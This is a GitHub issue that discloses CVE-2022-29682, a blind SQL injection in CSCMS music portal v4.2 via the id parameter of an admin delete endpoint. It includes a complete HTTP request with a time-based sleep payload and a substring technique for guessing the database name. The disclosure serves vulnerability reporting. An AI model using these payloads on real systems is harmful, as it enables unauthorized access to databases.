Headline
CVE-2022-29682: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #36 · chshcms/cscms
CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/vod/admin/topic/del.
Details
there is a Injection vulnerability exists in vod_Topic.php_del
The administrator needs to add a video theme after logging in. SQL injection vulnerability is generated when deleting the video theme. The constructed malicious payload is as follows
POST /admin.php/vod/admin/topic/del HTTP/1.1
Host: cscms.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://cscms.test/admin.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_session=3lvkrqraebntvbg76ecdifg0j6vl1bpl; cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA;XDEBUG_SESSION=PHPSTORM
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
id=(sleep(5))
You can see that success makes the server sleep
Construct payload to guess the database
There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C’, substr ((select + database()), 1,1) = ‘C’ is true, and the verification is correct